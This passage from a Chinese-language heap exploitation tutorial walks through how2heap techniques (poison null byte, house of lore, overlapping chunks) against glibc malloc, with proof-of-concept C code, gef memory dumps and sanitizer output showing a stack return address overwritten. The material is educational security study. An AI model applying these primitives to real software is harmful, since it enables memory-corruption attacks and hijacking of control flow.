0x603040:    0x0000000000000000    0x0000000000000000
0x603050:    0x0000000000000000    0x0000000000000000
0x603060:    0x0000000000000000    0x0000000000000000
0x603070:    0x0000000000000000    0x0000000000000000
0x603080:    0x0000000000000000    0x0000000000000000
0x603090:    0x0000000000000000    0x0000000000000000
0x6030a0:    0x0000000000000000    0x0000000000000000
0x6030b0:    0x0000000000000000    0x0000000000000000
0x6030c0:    0x0000000000000000    0x0000000000000000
0x6030d0:    0x0000000000000000    0x0000000000000000
0x6030e0:    0x0000000000000000    0x0000000000000000
0x6030f0:    0x0000000000000000    0x0000000000000000
0x603100:    0x0000000000000000    0x0000000000000000
0x603110:    0x0000000000000000    0x0000000000000000
0x603120:    0x0000000000000100    0x0000000000000000      <-- fake c.prev_size
0x603130:    0x0000000000000110    0x0000000000000090  <-- chunk c
0x603140:    0x0000000000000000    0x0000000000000000
gef➤  heap bins unsorted
[ Unsorted Bin for arena 'main_arena' ]
[+] unsorted_bins[0]: fw=0x603020, bk=0x603020
 →   Chunk(addr=0x603030, size=0x110, flags=PREV_INUSE)

最关键的一步，通过溢出漏洞覆写 chunk b 的数据：

gef➤  x/42gx a-0x10
0x603000:    0x0000000000000000    0x0000000000000021  <-- chunk a
0x603010:    0x0000000000000000    0x0000000000000000
0x603020:    0x0000000000000000    0x0000000000000100  <-- chunk b [be freed]
0x603030:    0x00007ffff7dd1b78    0x00007ffff7dd1b78      <-- fd, bk pointer
0x603040:    0x0000000000000000    0x0000000000000000
0x603050:    0x0000000000000000    0x0000000000000000
0x603060:    0x0000000000000000    0x0000000000000000
0x603070:    0x0000000000000000    0x0000000000000000
0x603080:    0x0000000000000000    0x0000000000000000
0x603090:    0x0000000000000000    0x0000000000000000
0x6030a0:    0x0000000000000000    0x0000000000000000
0x6030b0:    0x0000000000000000    0x0000000000000000
0x6030c0:    0x0000000000000000    0x0000000000000000
0x6030d0:    0x0000000000000000    0x0000000000000000
0x6030e0:    0x0000000000000000    0x0000000000000000
0x6030f0:    0x0000000000000000    0x0000000000000000
0x603100:    0x0000000000000000    0x0000000000000000
0x603110:    0x0000000000000000    0x0000000000000000
0x603120:    0x0000000000000100    0x0000000000000000      <-- fake c.prev_size
0x603130:    0x0000000000000110    0x0000000000000090  <-- chunk c
0x603140:    0x0000000000000000    0x0000000000000000
gef➤  heap bins unsorted
[ Unsorted Bin for arena 'main_arena' ]
[+] unsorted_bins[0]: fw=0x603020, bk=0x603020
 →   Chunk(addr=0x603030, size=0x100, flags=)

这时，根据我们上一篇文字中讲到的计算方法：

chunksize(P) == *((size_t*)(b-0x8)) & (~ 0x7) == 0x100
prev_size (next_chunk(P)) == *(size_t*)(b-0x10 + 0x100) == 0x100

可以成功绕过检查。另外 unsorted bin 中的 chunk 大小也变成了 0x100。

接下来随意分配两个 chunk，malloc 会从 unsorted bin 中划出合适大小的内存返回给用户：

gef➤  x/42gx a-0x10
0x603000:    0x0000000000000000    0x0000000000000021  <-- chunk a
0x603010:    0x0000000000000000    0x0000000000000000
0x603020:    0x0000000000000000    0x0000000000000091  <-- chunk b1  <-- fake chunk b
0x603030:    0x4141414141414141    0x4141414141414141
0x603040:    0x4141414141414141    0x4141414141414141
0x603050:    0x4141414141414141    0x4141414141414141
0x603060:    0x4141414141414141    0x4141414141414141
0x603070:    0x4141414141414141    0x4141414141414141
0x603080:    0x4141414141414141    0x4141414141414141
0x603090:    0x4141414141414141    0x4141414141414141
0x6030a0:    0x4141414141414141    0x4141414141414141
0x6030b0:    0x0000000000000000    0x0000000000000051  <-- chunk b2  <-- 'victim' chunk
0x6030c0:    0x4141414141414141    0x4141414141414141
0x6030d0:    0x4141414141414141    0x4141414141414141
0x6030e0:    0x4141414141414141    0x4141414141414141
0x6030f0:    0x4141414141414141    0x4141414141414141
0x603100:    0x0000000000000000    0x0000000000000021  <-- unsorted bin
0x603110:    0x00007ffff7dd1b78    0x00007ffff7dd1b78      <-- fd, bk pointer
0x603120:    0x0000000000000020    0x0000000000000000      <-- fake c.prev_size
0x603130:    0x0000000000000110    0x0000000000000090  <-- chunk c
0x603140:    0x0000000000000000    0x0000000000000000
gef➤  heap bins unsorted
[ Unsorted Bin for arena 'main_arena' ]
[+] unsorted_bins[0]: fw=0x603100, bk=0x603100
 →   Chunk(addr=0x603110, size=0x20, flags=PREV_INUSE)

这里有个很有趣的东西，分配堆块后，发生变化的是 fake c.prev_size，而不是 c.prev_size。所以 chunk c 依然认为 chunk b 的地方有一个大小为 0x110 的 free chunk。但其实这片内存已经被分配给了 chunk b1。

接下来是见证奇迹的时刻，我们知道，两个相邻的 small chunk 被释放后会被合并在一起。首先释放 chunk b1，伪造出 fake chunk b 是 free chunk 的样子。然后释放 chunk c，这时程序会发现 chunk c 的前一个 chunk 是一个 free chunk，然后就将它们合并在了一起，并从 unsorted bin 中取出来合并进了 top chunk。可怜的 chunk 2 位于 chunk b1 和 chunk c 之间，被直接无视了，现在 malloc 认为这整块区域都是未分配的，新的 top chunk 指针已经说明了一切。

gef➤  x/42gx a-0x10
0x603000:    0x0000000000000000    0x0000000000000021  <-- chunk a
0x603010:    0x0000000000000000    0x0000000000000000
0x603020:    0x0000000000000000    0x0000000000020fe1  <-- top chunk
0x603030:    0x0000000000603100    0x00007ffff7dd1b78
0x603040:    0x4141414141414141    0x4141414141414141
0x603050:    0x4141414141414141    0x4141414141414141
0x603060:    0x4141414141414141    0x4141414141414141
0x603070:    0x4141414141414141    0x4141414141414141
0x603080:    0x4141414141414141    0x4141414141414141
0x603090:    0x4141414141414141    0x4141414141414141
0x6030a0:    0x4141414141414141    0x4141414141414141
0x6030b0:    0x0000000000000090    0x0000000000000050  <-- chunk b2  <-- 'victim' chunk
0x6030c0:    0x4141414141414141    0x4141414141414141
0x6030d0:    0x4141414141414141    0x4141414141414141
0x6030e0:    0x4141414141414141    0x4141414141414141
0x6030f0:    0x4141414141414141    0x4141414141414141
0x603100:    0x0000000000000000    0x0000000000000021  <-- unsorted bin
0x603110:    0x00007ffff7dd1b78    0x00007ffff7dd1b78      <-- fd, bk pointer
0x603120:    0x0000000000000020    0x0000000000000000
0x603130:    0x0000000000000110    0x0000000000000090
0x603140:    0x0000000000000000    0x0000000000000000
gef➤  heap bins unsorted
[ Unsorted Bin for arena 'main_arena' ]
[+] unsorted_bins[0]: fw=0x603100, bk=0x603100
 →   Chunk(addr=0x603110, size=0x20, flags=PREV_INUSE)

chunk 合并的过程如下，首先该 chunk 与前一个 chunk 合并，然后检查下一个 chunk 是否为 top chunk，如果不是，将合并后的 chunk 放回 unsorted bin 中，否则，合并进 top chunk：

    /* consolidate backward */
    if (!prev_inuse(p)) {
      prevsize = p->prev_size;
      size += prevsize;
      p = chunk_at_offset(p, -((long) prevsize));
      unlink(av, p, bck, fwd);
    }

    if (nextchunk != av->top) {
    /*
  Place the chunk in unsorted chunk list. Chunks are
  not placed into regular bins until after they have
  been given one chance to be used in malloc.
    */
      [...]
    }

    /*
      If the chunk borders the current high end of memory,
      consolidate into top
    */

    else {
      size += nextsize;
      set_head(p, size | PREV_INUSE);
      av->top = p;
      check_chunk(av, p);
    }

接下来，申请一块大空间，大到可以把 chunk b2 包含进来，这样 chunk b2 就完全被我们控制了。

gef➤  x/42gx a-0x10
0x603000:    0x0000000000000000    0x0000000000000021  <-- chunk a
0x603010:    0x0000000000000000    0x0000000000000000
0x603020:    0x0000000000000000    0x0000000000000121  <-- chunk d
0x603030:    0x4242424242424242    0x4242424242424242
0x603040:    0x4242424242424242    0x4242424242424242
0x603050:    0x4242424242424242    0x4242424242424242
0x603060:    0x4242424242424242    0x4242424242424242
0x603070:    0x4242424242424242    0x4242424242424242
0x603080:    0x4242424242424242    0x4242424242424242
0x603090:    0x4242424242424242    0x4242424242424242
0x6030a0:    0x4242424242424242    0x4242424242424242
0x6030b0:    0x4242424242424242    0x4242424242424242  <-- chunk b2  <-- 'victim' chunk
0x6030c0:    0x4242424242424242    0x4242424242424242
0x6030d0:    0x4242424242424242    0x4242424242424242
0x6030e0:    0x4141414141414141    0x4141414141414141
0x6030f0:    0x4141414141414141    0x4141414141414141
0x603100:    0x0000000000000000    0x0000000000000021  <-- small bins
0x603110:    0x00007ffff7dd1b88    0x00007ffff7dd1b88      <-- fd, bk pointer
0x603120:    0x0000000000000020    0x0000000000000000
0x603130:    0x0000000000000110    0x0000000000000090
0x603140:    0x0000000000000000    0x0000000000020ec1  <-- top chunk
gef➤  heap bins small
[ Small Bins for arena 'main_arena' ]
[+] small_bins[1]: fw=0x603100, bk=0x603100
 →   Chunk(addr=0x603110, size=0x20, flags=PREV_INUSE)

还有个事情值得注意，在分配 chunk d 时，由于在 unsorted bin 中没有找到适合的 chunk，malloc 就将 unsorted bin 中的 chunk 都整理回各自的 bins 中了，这里就是 small bins。

最后，继续看 libc-2.26 上的情况，还是一样的，处理好 tchache 就可以了，把两种大小的 tcache bin 都占满。

heap-buffer-overflow，但不知道为什么，加了内存检测参数后，real size 只能是正常的 0x10 了。

$ gcc -fsanitize=address -g poison_null_byte.c
$ ./a.out
We allocate 0x10 bytes for 'a': 0x60200000eff0
'real' size of 'a': 0x10
b: 0x611000009f00
c: 0x60c00000bf80
=================================================================
==2369==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x611000009ef8 at pc 0x000000400be0 bp 0x7ffe7826e9a0 sp 0x7ffe7826e990
READ of size 8 at 0x611000009ef8 thread T0
    #0 0x400bdf in main /home/firmy/how2heap/poison_null_byte.c:22
    #1 0x7f47d8fe382f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
    #2 0x400978 in _start (/home/firmy/how2heap/a.out+0x400978)

0x611000009ef8 is located 8 bytes to the left of 256-byte region [0x611000009f00,0x61100000a000)
allocated by thread T0 here:
    #0 0x7f47d9425602 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x98602)
    #1 0x400af1 in main /home/firmy/how2heap/poison_null_byte.c:15
    #2 0x7f47d8fe382f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)

house_of_lore

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>

void jackpot(){ puts("Nice jump d00d"); exit(0); }

int main() {
    intptr_t *victim = malloc(0x80);
    memset(victim, 'A', 0x80);
    void *p5 = malloc(0x10);
    memset(p5, 'A', 0x10);
    intptr_t *victim_chunk = victim - 2;
    fprintf(stderr, "Allocated the victim (small) chunk: %p\n", victim);

    intptr_t* stack_buffer_1[4] = {0};
    intptr_t* stack_buffer_2[3] = {0};
    stack_buffer_1[0] = 0;
    stack_buffer_1[2] = victim_chunk;
    stack_buffer_1[3] = (intptr_t*)stack_buffer_2;
    stack_buffer_2[2] = (intptr_t*)stack_buffer_1;
    fprintf(stderr, "stack_buffer_1: %p\n", (void*)stack_buffer_1);
    fprintf(stderr, "stack_buffer_2: %p\n\n", (void*)stack_buffer_2);

    free((void*)victim);
    fprintf(stderr, "Freeing the victim chunk %p, it will be inserted in the unsorted bin\n", victim);
    fprintf(stderr, "victim->fd: %p\n", (void *)victim[0]);
    fprintf(stderr, "victim->bk: %p\n\n", (void *)victim[1]);

    void *p2 = malloc(0x100);
    fprintf(stderr, "Malloc a chunk that can't be handled by the unsorted bin, nor the SmallBin: %p\n", p2);
    fprintf(stderr, "The victim chunk %p will be inserted in front of the SmallBin\n", victim);
    fprintf(stderr, "victim->fd: %p\n", (void *)victim[0]);
    fprintf(stderr, "victim->bk: %p\n\n", (void *)victim[1]);

    victim[1] = (intptr_t)stack_buffer_1;
    fprintf(stderr, "Now emulating a vulnerability that can overwrite the victim->bk pointer\n");

    void *p3 = malloc(0x40);
    char *p4 = malloc(0x80);
    memset(p4, 'A', 0x10);
    fprintf(stderr, "This last malloc should return a chunk at the position injected in bin->bk: %p\n", p4);
    fprintf(stderr, "The fd pointer of stack_buffer_2 has changed: %p\n\n", stack_buffer_2[2]);

    intptr_t sc = (intptr_t)jackpot;
    memcpy((p4+40), &sc, 8);
}
$ gcc -g house_of_lore.c
$ ./a.out
Allocated the victim (small) chunk: 0x1b2e010
stack_buffer_1: 0x7ffe5c570350
stack_buffer_2: 0x7ffe5c570330

Freeing the victim chunk 0x1b2e010, it will be inserted in the unsorted bin
victim->fd: 0x7f239d4c9b78
victim->bk: 0x7f239d4c9b78

Malloc a chunk that can't be handled by the unsorted bin, nor the SmallBin: 0x1b2e0c0
The victim chunk 0x1b2e010 will be inserted in front of the SmallBin
victim->fd: 0x7f239d4c9bf8
victim->bk: 0x7f239d4c9bf8

Now emulating a vulnerability that can overwrite the victim->bk pointer
This last malloc should return a chunk at the position injected in bin->bk: 0x7ffe5c570360
The fd pointer of stack_buffer_2 has changed: 0x7f239d4c9bf8

Nice jump d00d

在前面的技术中，我们已经知道怎样去伪造一个 fake chunk，接下来，我们要尝试伪造一条 small bins 链。

首先创建两个 chunk，第一个是我们的 victim chunk，请确保它是一个 small chunk，第二个随意，只是为了确保在 free 时 victim chunk 不会被合并进 top chunk 里。然后，在栈上伪造两个 fake chunk，让 fake chunk 1 的 fd 指向 victim chunk，bk 指向 fake chunk 2；fake chunk 2 的 fd 指向 fake chunk 1，这样一个 small bin 链就差不多了：

gef➤  x/26gx victim-2
0x603000:    0x0000000000000000    0x0000000000000091  <-- victim chunk
0x603010:    0x4141414141414141    0x4141414141414141
0x603020:    0x4141414141414141    0x4141414141414141
0x603030:    0x4141414141414141    0x4141414141414141
0x603040:    0x4141414141414141    0x4141414141414141
0x603050:    0x4141414141414141    0x4141414141414141
0x603060:    0x4141414141414141    0x4141414141414141
0x603070:    0x4141414141414141    0x4141414141414141
0x603080:    0x4141414141414141    0x4141414141414141
0x603090:    0x0000000000000000    0x0000000000000021  <-- chunk p5
0x6030a0:    0x4141414141414141    0x4141414141414141
0x6030b0:    0x0000000000000000    0x0000000000020f51  <-- top chunk
0x6030c0:    0x0000000000000000    0x0000000000000000
gef➤  x/10gx &stack_buffer_2
0x7fffffffdc30:    0x0000000000000000    0x0000000000000000  <-- fake chunk 2
0x7fffffffdc40:    0x00007fffffffdc50    0x0000000000400aed      <-- fd->fake chunk 1
0x7fffffffdc50:    0x0000000000000000    0x0000000000000000  <-- fake chunk 1
0x7fffffffdc60:    0x0000000000603000    0x00007fffffffdc30      <-- fd->victim chunk, bk->fake chunk 2
0x7fffffffdc70:    0x00007fffffffdd60    0x7c008088c400bc00

molloc 中对于 small bin 链表的检查是这样的：

          [...]

          else
            {
              bck = victim->bk;
    if (__glibc_unlikely (bck->fd != victim))
                {
                  errstr = "malloc(): smallbin double linked list corrupted";
                  goto errout;
                }
              set_inuse_bit_at_offset (victim, nb);
              bin->bk = bck;
              bck->fd = bin;

              [...]

即检查 bin 中第二块的 bk 指针是否指向第一块，来发现对 small bins 的破坏。为了绕过这个检查，所以才需要同时伪造 bin 中的前 2 个 chunk。

接下来释放掉 victim chunk，它会被放到 unsoted bin 中，且 fd/bk 均指向 unsorted bin 的头部：

gef➤  x/26gx victim-2
0x603000:    0x0000000000000000    0x0000000000000091  <-- victim chunk [be freed]
0x603010:    0x00007ffff7dd1b78    0x00007ffff7dd1b78      <-- fd, bk pointer
0x603020:    0x4141414141414141    0x4141414141414141
0x603030:    0x4141414141414141    0x4141414141414141
0x603040:    0x4141414141414141    0x4141414141414141
0x603050:    0x4141414141414141    0x4141414141414141
0x603060:    0x4141414141414141    0x4141414141414141
0x603070:    0x4141414141414141    0x4141414141414141
0x603080:    0x4141414141414141    0x4141414141414141
0x603090:    0x0000000000000090    0x0000000000000020  <-- chunk p5
0x6030a0:    0x4141414141414141    0x4141414141414141
0x6030b0:    0x0000000000000000    0x0000000000020f51  <-- top chunk
0x6030c0:    0x0000000000000000    0x0000000000000000
gef➤  heap bins unsorted
[ Unsorted Bin for arena 'main_arena' ]
[+] unsorted_bins[0]: fw=0x603000, bk=0x603000
 →   Chunk(addr=0x603010, size=0x90, flags=PREV_INUSE)

这时，申请一块大的 chunk，只需要大到让 malloc 在 unsorted bin 中找不到合适的就可以了。这样原本在 unsorted bin 中的 chunk，会被整理回各自的所属的 bins 中，这里就是 small bins：

gef➤  heap bins small
[ Small Bins for arena 'main_arena' ]
[+] small_bins[8]: fw=0x603000, bk=0x603000
 →   Chunk(addr=0x603010, size=0x90, flags=PREV_INUSE)

接下来是最关键的一步，假设存在一个漏洞，可以让我们修改 victim chunk 的 bk 指针。那么就修改 bk 让它指向我们在栈上布置的 fake small bin：

gef➤  x/26gx victim-2
0x603000:    0x0000000000000000    0x0000000000000091  <-- victim chunk [be freed]
0x603010:    0x00007ffff7dd1bf8    0x00007fffffffdc50      <-- bk->fake chunk 1
0x603020:    0x4141414141414141    0x4141414141414141
0x603030:    0x4141414141414141    0x4141414141414141
0x603040:    0x4141414141414141    0x4141414141414141
0x603050:    0x4141414141414141    0x4141414141414141
0x603060:    0x4141414141414141    0x4141414141414141
0x603070:    0x4141414141414141    0x4141414141414141
0x603080:    0x4141414141414141    0x4141414141414141
0x603090:    0x0000000000000090    0x0000000000000020  <-- chunk p5
0x6030a0:    0x4141414141414141    0x4141414141414141
0x6030b0:    0x0000000000000000    0x0000000000000111  <-- chunk p2
0x6030c0:    0x0000000000000000    0x0000000000000000
gef➤  x/10gx &stack_buffer_2
0x7fffffffdc30:    0x0000000000000000    0x0000000000000000  <-- fake chunk 2
0x7fffffffdc40:    0x00007fffffffdc50    0x0000000000400aed      <-- fd->fake chunk 1
0x7fffffffdc50:    0x0000000000000000    0x0000000000000000  <-- fake chunk 1
0x7fffffffdc60:    0x0000000000603000    0x00007fffffffdc30     <-- fd->victim chunk, bk->fake chunk 2
0x7fffffffdc70:    0x00007fffffffdd60    0x7c008088c400bc00

我们知道 small bins 是先进后出的，节点的增加发生在链表头部，而删除发生在尾部。这时整条链是这样的：

HEAD(undefined) <-> fake chunk 2 <-> fake chunk 1 <-> victim chunk <-> TAIL

fd: ->
bk: <-

fake chunk 2 的 bk 指向了一个未定义的地址，如果能通过内存泄露等手段，拿到 HEAD 的地址并填进去，整条链就闭合了。当然这里完全没有必要这么做。

接下来的第一个 malloc，会返回 victim chunk 的地址，如果 malloc 的大小正好等于 victim chunk 的大小，那么情况会简单一点。但是这里我们不这样做，malloc 一个小一点的地址，可以看到，malloc 从 small bin 里取出了末尾的 victim chunk，切了一块返回给 chunk p3，然后把剩下的部分放回到了 unsorted bin。同时 small bin 变成了这样：

HEAD(undefined) <-> fake chunk 2 <-> fake chunk 1 <-> TAIL
gef➤  x/26gx victim-2
0x603000:    0x0000000000000000    0x0000000000000051  <-- chunk p3
0x603010:    0x00007ffff7dd1bf8    0x00007fffffffdc50
0x603020:    0x4141414141414141    0x4141414141414141
0x603030:    0x4141414141414141    0x4141414141414141
0x603040:    0x4141414141414141    0x4141414141414141
0x603050:    0x4141414141414141    0x0000000000000041  <-- unsorted bin
0x603060:    0x00007ffff7dd1b78    0x00007ffff7dd1b78      <-- fd, bk pointer
0x603070:    0x4141414141414141    0x4141414141414141
0x603080:    0x4141414141414141    0x4141414141414141
0x603090:    0x0000000000000040    0x0000000000000020  <-- chunk p5
0x6030a0:    0x4141414141414141    0x4141414141414141
0x6030b0:    0x0000000000000000    0x0000000000000111  <-- chunk p2
0x6030c0:    0x0000000000000000    0x0000000000000000
gef➤  x/10gx &stack_buffer_2
0x7fffffffdc30:    0x0000000000000000    0x0000000000000000  <-- fake chunk 2
0x7fffffffdc40:    0x00007fffffffdc50    0x0000000000400aed      <-- fd->fake chunk 1
0x7fffffffdc50:    0x0000000000000000    0x0000000000000000  <-- fake chunk 1
0x7fffffffdc60:    0x00007ffff7dd1bf8    0x00007fffffffdc30      <-- fd->TAIL, bk->fake chunk 2
0x7fffffffdc70:    0x00007fffffffdd60    0x7c008088c400bc00
gef➤  heap bins unsorted
[ Unsorted Bin for arena 'main_arena' ]
[+] unsorted_bins[0]: fw=0x603050, bk=0x603050
 →   Chunk(addr=0x603060, size=0x40, flags=PREV_INUSE)

最后，再次 malloc 将返回 fake chunk 1 的地址，地址在栈上且我们能够控制。同时 small bin 变成这样：

HEAD(undefined) <-> fake chunk 2 <-> TAIL
gef➤  x/10gx &stack_buffer_2
0x7fffffffdc30:    0x0000000000000000    0x0000000000000000  <-- fake chunk 2
0x7fffffffdc40:    0x00007ffff7dd1bf8    0x0000000000400aed      <-- fd->TAIL
0x7fffffffdc50:    0x0000000000000000    0x0000000000000000  <-- chunk 4
0x7fffffffdc60:    0x4141414141414141    0x4141414141414141
0x7fffffffdc70:    0x00007fffffffdd60    0x7c008088c400bc00

于是我们就成功地骗过了 malloc 在栈上分配了一个 chunk。

最后再想一下，其实最初的 victim chunk 使用 fast chunk 也是可以的，其释放后虽然是被加入到 fast bins 中，而不是 unsorted bin，但 malloc 之后，也会被整理到 small bins 里。自行尝试吧。

heap-use-after-free，所以上面我们用于修改 bk 指针的漏洞，应该就是一个 UAF 吧，当然溢出也是可以的：

$ gcc -fsanitize=address -g house_of_lore.c
$ ./a.out
Allocated the victim (small) chunk: 0x60c00000bf80
stack_buffer_1: 0x7ffd1fbc5cd0
stack_buffer_2: 0x7ffd1fbc5c90

Freeing the victim chunk 0x60c00000bf80, it will be inserted in the unsorted bin
=================================================================
==6034==ERROR: AddressSanitizer: heap-use-after-free on address 0x60c00000bf80 at pc 0x000000400eec bp 0x7ffd1fbc5bf0 sp 0x7ffd1fbc5be0
READ of size 8 at 0x60c00000bf80 thread T0
    #0 0x400eeb in main /home/firmy/how2heap/house_of_lore.c:27
    #1 0x7febee33c82f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
    #2 0x400b38 in _start (/home/firmy/how2heap/a.out+0x400b38)

最后再给一个 libc-2.27 版本的：

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>

void jackpot(){ puts("Nice jump d00d"); exit(0); }

int main() {
    intptr_t *victim = malloc(0x80);

    // fill the tcache
    int *a[10];
    int i;
    for (i = 0; i < 7; i++) {
        a[i] = malloc(0x80);
    }
    for (i = 0; i < 7; i++) {
        free(a[i]);
    }

    memset(victim, 'A', 0x80);
    void *p5 = malloc(0x10);
    memset(p5, 'A', 0x10);
    intptr_t *victim_chunk = victim - 2;
    fprintf(stderr, "Allocated the victim (small) chunk: %p\n", victim);

    intptr_t* stack_buffer_1[4] = {0};
    intptr_t* stack_buffer_2[6] = {0};
    stack_buffer_1[0] = 0;
    stack_buffer_1[2] = victim_chunk;
    stack_buffer_1[3] = (intptr_t*)stack_buffer_2;
    stack_buffer_2[2] = (intptr_t*)stack_buffer_1;
    stack_buffer_2[3] = (intptr_t*)stack_buffer_1;    // 3675 bck->fd = bin;

    fprintf(stderr, "stack_buffer_1: %p\n", (void*)stack_buffer_1);
    fprintf(stderr, "stack_buffer_2: %p\n\n", (void*)stack_buffer_2);

    free((void*)victim);
    fprintf(stderr, "Freeing the victim chunk %p, it will be inserted in the unsorted bin\n", victim);
    fprintf(stderr, "victim->fd: %p\n", (void *)victim[0]);
    fprintf(stderr, "victim->bk: %p\n\n", (void *)victim[1]);

    void *p2 = malloc(0x100);
    fprintf(stderr, "Malloc a chunk that can't be handled by the unsorted bin, nor the SmallBin: %p\n", p2);
    fprintf(stderr, "The victim chunk %p will be inserted in front of the SmallBin\n", victim);
    fprintf(stderr, "victim->fd: %p\n", (void *)victim[0]);
    fprintf(stderr, "victim->bk: %p\n\n", (void *)victim[1]);

    victim[1] = (intptr_t)stack_buffer_1;
    fprintf(stderr, "Now emulating a vulnerability that can overwrite the victim->bk pointer\n");

    void *p3 = malloc(0x40);

    // empty the tcache
    for (i = 0; i < 7; i++) {
        a[i] = malloc(0x80);
    }

    char *p4 = malloc(0x80);
    memset(p4, 'A', 0x10);
    fprintf(stderr, "This last malloc should return a chunk at the position injected in bin->bk: %p\n", p4);
    fprintf(stderr, "The fd pointer of stack_buffer_2 has changed: %p\n\n", stack_buffer_2[2]);

    intptr_t sc = (intptr_t)jackpot;
    memcpy((p4+0xa8), &sc, 8);
}
$ gcc -g house_of_lore.c
$ ./a.out
Allocated the victim (small) chunk: 0x55674d75f260
stack_buffer_1: 0x7ffff71fb1d0
stack_buffer_2: 0x7ffff71fb1f0

Freeing the victim chunk 0x55674d75f260, it will be inserted in the unsorted bin
victim->fd: 0x7f1eba392b00
victim->bk: 0x7f1eba392b00

Malloc a chunk that can't be handled by the unsorted bin, nor the SmallBin: 0x55674d75f700
The victim chunk 0x55674d75f260 will be inserted in front of the SmallBin
victim->fd: 0x7f1eba392b80
victim->bk: 0x7f1eba392b80

Now emulating a vulnerability that can overwrite the victim->bk pointer
This last malloc should return a chunk at the position injected in bin->bk: 0x7ffff71fb1e0
The fd pointer of stack_buffer_2 has changed: 0x7ffff71fb1e0

Nice jump d00d

overlapping_chunks

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>

int main() {
    intptr_t *p1,*p2,*p3,*p4;

    p1 = malloc(0x90 - 8);
    p2 = malloc(0x90 - 8);
    p3 = malloc(0x80 - 8);
    memset(p1, 'A', 0x90 - 8);
    memset(p2, 'A', 0x90 - 8);
    memset(p3, 'A', 0x80 - 8);
    fprintf(stderr, "Now we allocate 3 chunks on the heap\n");
    fprintf(stderr, "p1=%p\np2=%p\np3=%p\n\n", p1, p2, p3);

    free(p2);
    fprintf(stderr, "Freeing the chunk p2\n");

    int evil_chunk_size = 0x111;
    int evil_region_size = 0x110 - 8;
    *(p2-1) = evil_chunk_size; // Overwriting the "size" field of chunk p2
    fprintf(stderr, "Emulating an overflow that can overwrite the size of the chunk p2.\n\n");

    p4 = malloc(evil_region_size);
    fprintf(stderr, "p4: %p ~ %p\n", p4, p4+evil_region_size);
    fprintf(stderr, "p3: %p ~ %p\n", p3, p3+0x80);

    fprintf(stderr, "\nIf we memset(p4, 'B', 0xd0), we have:\n");
    memset(p4, 'B', 0xd0);
    fprintf(stderr, "p4 = %s\n", (char *)p4);
    fprintf(stderr, "p3 = %s\n", (char *)p3);

    fprintf(stderr, "\nIf we memset(p3, 'C', 0x50), we have:\n");
    memset(p3, 'C', 0x50);
    fprintf(stderr, "p4 = %s\n", (char *)p4);
    fprintf(stderr, "p3 = %s\n", (char *)p3);
}
$ gcc -g overlapping_chunks.c
$ ./a.out
Now we allocate 3 chunks on the heap
p1=0x1e2b010
p2=0x1e2b0a0
p3=0x1e2b130

Freeing the chunk p2
Emulating an overflow that can overwrite the size of the chunk p2.

p4: 0x1e2b0a0 ~ 0x1e2b8e0
p3: 0x1e2b130 ~ 0x1e2b530

If we memset(p4, 'B', 0xd0), we have:
p4 = BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAa
p3 = BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAa

If we memset(p3, 'C', 0x50), we have:
p4 = BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAa
p3 = CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAa

这个比较简单，就是堆块重叠的问题。通过一个溢出漏洞，改写 unsorted bin 中空闲堆块的 size，改变下一次 malloc 可以返回的堆块大小。

首先分配三个堆块，然后释放掉中间的一个：

gef➤  x/60gx 0x602010-0x10
0x602000:    0x0000000000000000    0x0000000000000091  <-- chunk 1
0x602010:    0x4141414141414141    0x4141414141414141
0x602020:    0x4141414141414141    0x4141414141414141
0x602030:    0x4141414141414141    0x4141414141414141
0x602040:    0x4141414141414141    0x4141414141414141
0x602050:    0x4141414141414141    0x4141414141414141
0x602060:    0x4141414141414141    0x4141414141414141
0x602070:    0x4141414141414141    0x4141414141414141
0x602080:    0x4141414141414141    0x4141414141414141
0x602090:    0x4141414141414141    0x0000000000000091  <-- chunk 2 [be freed]
0x6020a0:    0x00007ffff7dd1b78    0x00007ffff7dd1b78
0x6020b0:    0x4141414141414141    0x4141414141414141
0x6020c0:    0x4141414141414141    0x4141414141414141
0x6020d0:    0x4141414141414141    0x4141414141414141
0x6020e0:    0x4141414141414141    0x4141414141414141
0x6020f0:    0x4141414141414141    0x4141414141414141
0x602100:    0x4141414141414141    0x4141414141414141
0x602110:    0x4141414141414141    0x4141414141414141
0x602120:    0x0000000000000090    0x0000000000000080  <-- chunk 3
0x602130:    0x4141414141414141    0x4141414141414141
0x602140:    0x4141414141414141    0x4141414141414141
0x602150:    0x4141414141414141    0x4141414141414141
0x602160:    0x4141414141414141    0x4141414141414141
0x602170:    0x4141414141414141    0x4141414141414141
0x602180:    0x4141414141414141    0x4141414141414141
0x602190:    0x4141414141414141    0x4141414141414141
